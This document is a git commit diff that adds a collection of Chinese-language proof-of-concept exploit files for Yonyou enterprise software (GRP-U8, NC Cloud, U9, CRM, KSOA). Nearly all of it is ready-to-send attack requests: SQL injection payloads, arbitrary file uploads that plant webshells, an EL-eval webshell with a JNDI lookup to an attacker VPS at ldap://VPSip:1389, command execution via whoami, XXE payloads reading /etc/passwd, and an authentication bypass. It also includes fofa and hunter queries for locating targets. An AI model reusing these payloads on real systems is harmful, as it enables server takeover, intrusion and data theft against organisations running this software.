整理文件

2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
--- a/用友OA/某友时空KSOA
+++ b/用友OA/某友时空KSOA
@@ -0,0 +1,11 @@
+## 某友时空KSOA PayBill SQL注入漏洞
+```
+POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 134
+Accept-Encoding: gzip, deflate
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
+```
--- a/存在SQL注入.md
+++ b/存在SQL注入.md
@@ -0,0 +1,18 @@
+
+## 用友 GRP U8 license_check.jsp 存在SQL注入
+
+## sql注入payload
+```
+';WAITFOR DELAY '0:0:5'-- q
+```
+
+## poc
+```
+
+GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+Connection: close
+```
+
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/Lc4ILVKo1g8Fcvju7pia1Lgsn9t5LBBrZibkYPnsDqIIA3LNhWdFso2I2DMibJJ4DQZbvCibWlRJJqfeib7ZiafvQiceA/640?wx_fmt=png&wxfrom=13)
--- a/bx_historyDataCheck.jsp
+++ b/bx_historyDataCheck.jsp
@@ -0,0 +1,15 @@
+## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
+
+## fofa-qeury
+app="yonyou-GRP-U8"
+
+## POC
+```
+POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
+Host: 
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+
+userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
+```
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@@ -0,0 +1,63 @@
+## 用友 NC Cloud jsinvoke 任意文件上传漏洞
+漏洞描述
+用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限
+app="用友-NC-Cloud"
+
+## 写入webshell
+```
+POST /uapjs/jsinvoke/?action=invoke
+Content-Type: application/json
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
+    "webapps/nc_web/407.jsp"
+  ]
+}
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host:
+Connection: Keep-Alive
+Content-Length: 253
+Content-Type: application/x-www-form-urlencoded
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
+    "webapps/nc_web/301.jsp"
+  ]
+}
+
+```
+
+## 执行命令
+```
+
+POST /407.jsp?error=bsh.Interpreter HTTP/1.1
+Host: *
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close    
+Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E
+If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT
+If-None-Match: W/"370397-1670602379000"
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+           
+cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
+```
+
--- a/用友OA/用友
+++ b/用友OA/用友
@@ -0,0 +1,40 @@
+## 用友 NC uapws wsdl XXE漏洞
+用友 NC uapws wsdl 存在XXE漏洞
+
+## fofa
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl
+
+GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1
+Host:
+Pragma: no-cache
+Cache-Control: no-cache
+Accept: text/plain, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/d11cc7e3-b0d2-484d-9911-ca742cc384d5)
+
+![image](https://github.com/wy876/POC/assets/139549762/7a77f089-7a6e-49e4-965b-59ebe9fe23fb)
+
+## xxe读取文件
+任意文件读取利用，需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件如下
+
+```
+windows:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>
+
+linux:
+evil.xml:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]><user><username>&name;</username><password>1</password></user>
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/dfbf0584-9fa5-45ea-92d0-0e13160d4bf0)
+
+![image](https://github.com/wy876/POC/assets/139549762/c218c1dd-e73b-42b5-bbce-f96da6efbb08)
+
--- a/用友OA/用友-U9-PatchFile.asmx任意文件上传漏洞.md
+++ b/用友OA/用友-U9-PatchFile.asmx任意文件上传漏洞.md
@@ -0,0 +1,37 @@
+## 用友-U9-PatchFile.asmx任意文件上传漏洞
+
+用友 U9 PatchFile.asmx 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。
+
+## fofa
+
+```
+body="logo-u9.png"
+```
+
+## poc
+
+```
+POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0
+Content-Length: 898
+Content-Type: text/xml; charset=utf-8
+Soapaction: "http://tempuri.org/SaveFile"
+Accept-Encoding: gzip, deflate, br
+Connection: close
+
+<?xml version="1.0" encoding="utf-8"?>
+ <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+   <SaveFile xmlns="http://tempuri.org/">
+    <binData>PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iSGVsbG9Xb3JsZEhhbmRsZXIiICU+Cgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5XZWI7CgpwdWJsaWMgY2xhc3MgSGVsbG9Xb3JsZEhhbmRsZXIgOiBJSHR0cEhhbmRsZXIKewogICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY29udGV4dCkKICAgIHsKICAgICAgICBjb250ZXh0LlJlc3BvbnNlLkNvbnRlbnRUeXBlID0gInRleHQvcGxhaW4iOwogICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIkhlbGxvLCBXb3JsZCEiKTsKICAgIH0KCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlCiAgICB7CiAgICAgICAgZ2V0IHsgcmV0dXJuIGZhbHNlOyB9CiAgICB9Cn0=</binData>
+    <path>./</path>
+    <fileName>bTRkH1.ashx</fileName>
+   </SaveFile>
+  </soap:Body>
+ </soap:Envelope>
+```
+
+![image-20240607192040364](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406071920424.png)
+
+路径：`http://127.0.0.1/CS/Office/AutoUpdates/bTRkH1.ashx`
--- a/任意文件读取漏洞.md
+++ b/任意文件读取漏洞.md
@@ -0,0 +1,12 @@
+## 用友CRM 任意文件读取漏洞
+
+## hunter
+```
+app.name="用友 CRM"
+```
+
+## poc
+```
+http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
+```
+![image](https://github.com/wy876/POC/assets/139549762/419deef4-d49f-4fe2-aa80-0c6b93174f58)
--- a/用友OA/用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md
+++ b/用友OA/用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 用友CRM客户关系管理系统import.php存在任意文件上传漏洞
+
+用友CRM客户关系管理系统import.php存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传webshell文件，从而获取到服务器权限。
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## fofa
+
+```yaml
+body="用友U8CRM"
+```
+
+## poc
+
+```yaml
+POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Content-Length: 277
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
+Upgrade-Insecure-Requests: 1
+
+------WebKitFormBoundarye0z8QbHs79gL8vW5
+Content-Disposition: form-data; name="xfile"; filename="11.xls"
+
+<?php phpinfo();?>
+------WebKitFormBoundarye0z8QbHs79gL8vW5
+Content-Disposition: form-data; name="combo"
+
+help.php
+------WebKitFormBoundarye0z8QbHs79gL8vW5--
+```
+
+![image-20240719191343917](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191913006.png)
+
+文件路径：`http://ip/tmpfile/help.php`
--- a/用友OA/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md
+++ b/用友OA/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md
@@ -0,0 +1,50 @@
+## 用友CRM系统存在逻辑漏洞直接登录后台
+
+## 鹰图
+```
+app.name="用友 CRM"
+```
+
+## poc
+```
+/background/reservationcomplete.php?ID=1
+```
+
+访问poc，页面返回空白
+![image](https://github.com/wy876/wiki/assets/139549762/75b9ae1d-43b2-4996-a1c9-a9d8bf50d388)
+
+直接就访问主要就登录后台了
+![image](https://github.com/wy876/wiki/assets/139549762/9381b9d2-3f2f-4007-bab7-56d62d7c6e81)
+
+![image](https://github.com/wy876/wiki/assets/139549762/6d6076b2-905d-4afe-8388-4ee532fd348a)
+
+
+## nuclei
+```
+id: yongyouU8_CRM-reservationcomplete
+info:
+  name: 用友CRM系统存在逻辑漏洞直接登录后台
+  author: wy876
+  severity: high
+
+http:
+  - raw:
+      - |
+        GET /background/reservationcomplete.php?ID=1 HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
+```
--- a/用友OA/用友CRM系统uploadfile.php接口存在任意文件上传.md
+++ b/用友OA/用友CRM系统uploadfile.php接口存在任意文件上传.md
@@ -0,0 +1,34 @@
+## 用友CRM系统uploadfile.php接口存在任意文件上传
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```yaml
+POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Connection: close
+Content-Length: 358
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855
+
+-----------------------------269520967239406871642430066855
+Content-Disposition: form-data; name="file"; filename="%s.php "
+Content-Type: application/octet-stream
+
+test123
+-----------------------------269520967239406871642430066855
+Content-Disposition: form-data; name="upload"
+
+upload
+-----------------------------269520967239406871642430066855--
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/195b7dfb-918c-448c-b774-8d141f14a29e)
--- a/用友OA/用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md
+++ b/用友OA/用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md
@@ -0,0 +1,29 @@
+# 用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞
+
+用友政务软件有限公司由用友（集团）和中国财政科学研究院共同设立，是面向政府部门、事业单位、非营利组织的全方位业务管理信息化解决方案提供商，是中国电子政务百强企业、中国领先的公共财政管理软件提供商、中国领先的行政事业单位计划财务管理软件提供商。公司的业务涵盖财政、银行、税务、社保、民生、公安、交通、海关、国土资源等行业。用友GRP A++Cloud政府财务云exe_sql存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+## fofa
+
+```yaml
+body="/pf/portal/login/css/fonts/style.css"
+```
+
+
+## poc
+
+```yaml
+POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1
+Host: {hostname}
+Content-Length: 279
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+exe_sql=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2867=2867) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171258885.png)
--- a/用友OA/用友GRP-U8-FileUpload任意文件上传.md
+++ b/用友OA/用友GRP-U8-FileUpload任意文件上传.md
@@ -0,0 +1,36 @@
+## 用友GRP-U8-FileUpload任意文件上传
+
+用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 FileUpload接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。
+
+## fofa
+
+```yaml
+app="用友-GRP-U8"
+```
+
+## poc
+
+```yaml
+POST /servlet/FileUpload?fileName=t.jsp&actionID=update HTTP/1.1
+Host: 
+Content-Length: 187
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryA8Ee42FOAqdLah9L
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryA8Ee42FOAqdLah9L
+Content-Disposition: form-data; name="rfile_name"; filename="2.png"
+Content-Type: image/png
+
+111
+------WebKitFormBoundaryA8Ee42FOAqdLah9L--
+```
+
+上传路径为`/R9iPortal/upload/t.jsp`
--- a/用友OA/用友GRP-U8-PayReturnForWcp接口存在XXE漏洞.md
+++ b/用友OA/用友GRP-U8-PayReturnForWcp接口存在XXE漏洞.md
@@ -0,0 +1,22 @@
+## 用友GRP-U8-PayReturnForWcp接口存在XXE漏洞
+
+## poc
+```
+POST /servlet/PayReturnForWcp HTTP/1.1
+Host: 172.16.135.132:8009
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: http://172.16.135.130:8009/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=6C0DA8A7DF854722ECB4A690B53F0C00
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 830
+
+<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "http://127.0.0.1:8009/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22Opentke%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22C:\UFGOV\U8\webapps\bx_cxjk_list.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
+```
--- a/用友OA/用友GRP-U8-Proxy存在SQL注入漏洞.md
+++ b/用友OA/用友GRP-U8-Proxy存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 用友GRP-U8-Proxy存在SQL注入漏洞
+
+
+## poc
+```
+POST /Proxy HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=6B57CA2AD409BF61FDD38BB1497626D2; userId=admin; rdUsrId=false; rdName=true; complex=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 571
+
+
+cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
+```
--- a/用友OA/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md
+++ b/用友OA/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md
@@ -0,0 +1,18 @@
+## 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞
+
+用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager，产品分B、C、G三个产品系列，以上受到本次通报漏洞的影响。用友GRP-U8 SelectDMJE.jsp 存在SQL注入漏洞。
+
+## fofa
+```
+app="用友-GRP-U8"
+```
+
+## poc
+```
+GET /u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+Connection: close
+```
+
+
--- a/用友OA/用友GRP-U8-UploadFileData任意文件上传.md
+++ b/用友OA/用友GRP-U8-UploadFileData任意文件上传.md
@@ -0,0 +1,34 @@
+## 用友GRP-U8-UploadFileData任意文件上传
+
+
+## poc
+```
+POST /UploadFileData?action=upload_file&filename=../.jtstpm.jsp HTTP/1.0
+Host: xxxxxx
+Connection: close
+Content-Length: 327
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzassocxz
+Cookie: JSESSIONID=0333BDE70A73627168772D5C50956A74
+Dfpajaxreq: 1.0
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="upload"; filename="jtstpm.jsp"
+Content-Type: application/octet-stream
+
+11111
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="submit"
+
+submit
+------WebKitFormBoundaryzassocxz--
+```
+
+文件路径 /R9iPortal/jtstpm.jsp
--- a/用友OA/用友GRP-U8-bx_dj_check.jsp存在SQL注入.md
+++ b/用友OA/用友GRP-U8-bx_dj_check.jsp存在SQL注入.md
@@ -0,0 +1,16 @@
+## 用友GRP-U8-bx_dj_check.jsp存在SQL注入
+
+## poc 
+```
+GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:3'-- HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1677835116; JSESSIONID=881972DA273F6E95D532FE7B5E5C488F
+Connection: close
+```
--- a/用友OA/用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入.md
+++ b/用友OA/用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入.md
@@ -0,0 +1,16 @@
+## 用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入
+
+## poc
+```
+GET /u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:3'-- HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1677835116; JSESSIONID=881972DA273F6E95D532FE7B5E5C488F
+Connection: close
+```
--- a/用友OA/用友GRP-U8-listSelectDialogServlet存在SQL注入.md
+++ b/用友OA/用友GRP-U8-listSelectDialogServlet存在SQL注入.md
@@ -0,0 +1,17 @@
+## 用友GRP-U8-listSelectDialogServlet存在SQL注入
+
+## poc
+```
+GET /listSelectDialogServlet?slType=slFZX&slCdtn=1=2;waitfor%20delay%20%270:0:3%27 HTTP/1.1
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+SOAPAction: 
+Host: 172.16.135.132:8009
+
+```
--- a/用友OA/用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md
+++ b/用友OA/用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md
@@ -0,0 +1,15 @@
+## 用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入
+
+## poc
+```
+GET /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'-- HTTP/1.1
+Host: 172.16.135.132:8009
+Cache-Control: max-age=0
+Origin: null
+DNT: 1
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
--- a/用友OA/用友GRP-U8-obr_zdybxd_check存在sql注入漏洞.md
+++ b/用友OA/用友GRP-U8-obr_zdybxd_check存在sql注入漏洞.md
@@ -0,0 +1,15 @@
+## 用友GRP-U8-obr_zdybxd_check存在sql注入漏洞
+
+## poc
+```
+GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![fa7a791ea47812cbec3d99f5b37fd7bb](https://github.com/wy876/POC/assets/139549762/8bee3c88-ed03-4c91-9935-63e6dc34b5cd)
--- a/用友OA/用友GRP-U8-operOriztion存在SQL注入漏洞.md
+++ b/用友OA/用友GRP-U8-operOriztion存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+## 用友GRP-U8-operOriztion存在SQL注入漏洞
+
+
+## poc
+```
+POST /services/operOriztion HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+Content-Type: text/xml;charset=UTF-8
+SOAPAction: ""
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
+<soapenv:Header/>
+<soapenv:Body>
+<wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+<kjnd xsi:type="xsd:string">' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- </kjnd>
+</wsdd:getGsbmfaByKjnd>
+</soapenv:Body>
+</soapenv:Envelope>
+```
--- a/用友OA/用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞.md
+++ b/用友OA/用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+## 用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞
+
+## fofa
+```
+app="用友-GRP-U8"
+```
+
+## poc
+```
+GET /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm=&kjnd= HTTP/1.1
+Host: xxxxxx
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
--- a/用友OA/用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞.md
+++ b/用友OA/用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+## 用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞
+
+## poc
+```
+GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
